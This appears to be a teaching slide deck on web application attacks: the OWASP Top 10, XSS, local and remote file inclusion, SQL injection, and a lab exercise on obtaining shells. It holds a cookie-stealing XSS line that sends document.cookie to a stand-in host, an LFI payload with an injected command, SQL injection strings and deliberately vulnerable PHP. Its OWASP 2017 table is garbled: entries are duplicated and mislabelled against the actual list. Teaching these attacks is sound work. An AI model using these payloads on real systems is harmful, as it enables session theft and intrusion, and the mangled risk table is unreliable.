**Slide 1: Web Application Attacks**
- **Web applications** can be written in various languages, each with its specific vulnerability classes.
- Main attack vectors are similar in concept.
- OWASP promotes security awareness and solutions for web application development.

**Slide 2: OWASP Top-10 Security Risks**

| Risk | Description |
| --- | --- |
| A1:2017 - Injection | Attacker can add malicious SQL, NoSQL, or command strings. |
| A2:2017 - Broken Authentication | Compromised credentials, weak defaults, or exposed keys. |
| A3:2017 - Sensitive Data Exposure | Unprotected data at rest or in transit. |
| A4:2017 - XML External Entity (XXE) | Attacker can exploit parsing of XML outside the standard. |
| A5:2017 - Security Misconfiguration | Default configurations, open cloud storage, misconfigured HTTP headers. |
| A6:2017 - Using Components with Known Vulnerabilities | Outdated or vulnerable libraries and frameworks. |
| A7:2017 - Insufficient Logging & Monitoring | Lack of logging and monitoring prevents detection of attacks. |
| A8:2017 - Insecure Deserialization | Vulnerable deserialization can lead to remote code execution. |
| A9:2017 - Using Known Vulnerable Components without Patching | Outdated software with known vulnerabilities. |
| A10:2017 - Insufficient Transport Layer Protection | Weak or no encryption, allowing man-in-the-middle attacks. |

**Slide 3: Cross-Site Scripting (XSS)**
- Unsanitized user input displayed as HTML.
- Allows malicious scripts to run in victim's browser.
  - Reflected (non-persistent): injected script runs immediately when the victim clicks the link.
  - Stored (persistent): web application delivers payload to the victim, script runs when viewed.
- Impact: cookie stealing, authentication bypass, redirection.

**Slide 4: XSS Example**
- Reflected XSS:

```html
<h1>XSS demo</h1>
<?php echo "Hello ". $_GET['name'];?>
```

- Stored XSS:

```html
<script>alert(1)</script>
```

**Slide 5: Cookie Stealing via XSS**
- JavaScript can make victim's browser send cookies to the attacker.

```javascript
new Image().src="http://example.com/bogus.php?output="+document.cookie;
```

**Slide 6: File Inclusion Vulnerabilities**
- Local File Inclusion (LFI) and Remote File Inclusion (RFI):
  - LFI: includes local files.
  - RFI: introduces own code to the webserver.
- Exploit depends on PHP versions and web server configurations.

**Slide 7: LFI Demonstration**
- Unsanitized `lang` parameter:

```php
<?php $lang=$_GET['lang']; include $lang.".php";?>
```

- Payload:

```bash
../uploads/avatars/image.jpg%00&cmd=ifconfig
```

**Slide 8: SQL Injection**
- Unsanitized user input passed to a database query.
- Manipulating data can change the nature of the query.
- Examples:
  - Bypassing authentication with `' OR '1'='1`
  - Extracting data using `' union select * from information_schema.columns --`

**Exercise:**
- Using OWASP Broken Web Applications project, demonstrate obtaining a shell with:
  - An LFI vulnerability in the web application with file upload.
  - An LFI vulnerability in the web application with contaminated logs.
  - An RFI vulnerability in the web application.
- Demonstrate attacks using SQL injection and Cross Site Scripting (XSS).
- Provide documentation and proof of useful attacks in your report.